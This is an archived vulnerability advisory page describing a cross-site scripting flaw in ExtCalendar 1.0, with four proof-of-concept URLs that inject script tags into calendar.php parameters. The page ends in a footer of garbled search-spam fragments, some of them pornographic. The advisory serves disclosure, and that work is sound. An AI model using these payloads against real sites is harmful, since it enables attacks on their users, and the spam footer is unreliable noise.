exploits , vulnerabilities , articles , ExtCalendar Cross-Site Scripting Vulnerabilities

Title	ExtCalendar Cross-Site Scripting Vulnerabilities
Published	2006-03-18-12:00AM
Updated	2006-03-18-12:00AM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Soothackers@gmail.com is credited with discovery.
Vulnerable	ExtCalendar ExtCalendar 1.0
Not Vulnerable	ExtCalendar ExtCalendar 2.0
Code	This issue can be exploited through a web client. The following proof-of-concept URIs are available: http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script> http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006 http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script> http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 18:38:49 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
free 18 ye free 18 ye sexey imag christina WWW.Sex777 sexy picto fgfdg remote adm murat phpbb port sexey imag 985087 www.sex98. christina IPB V1.0 WWW MALAYA I -90 india sax Dolphin Sm www.xvideo WWW.SEX 89 SHAKEELA F phpkit exp news for c w6709708 sex with d /index.php tamii Www indian Microsoft goodby squ maxcpm.inf /search/ex sexual fas maxcpm.inf Hotgirs www.bollyw Ww.X WWW.SEX 89 maxcpm.inf www.catky. all cartoo php+advanc www.sex oc Nametha se Searching tamilsdex www.indone PORNO KLIP Crack Data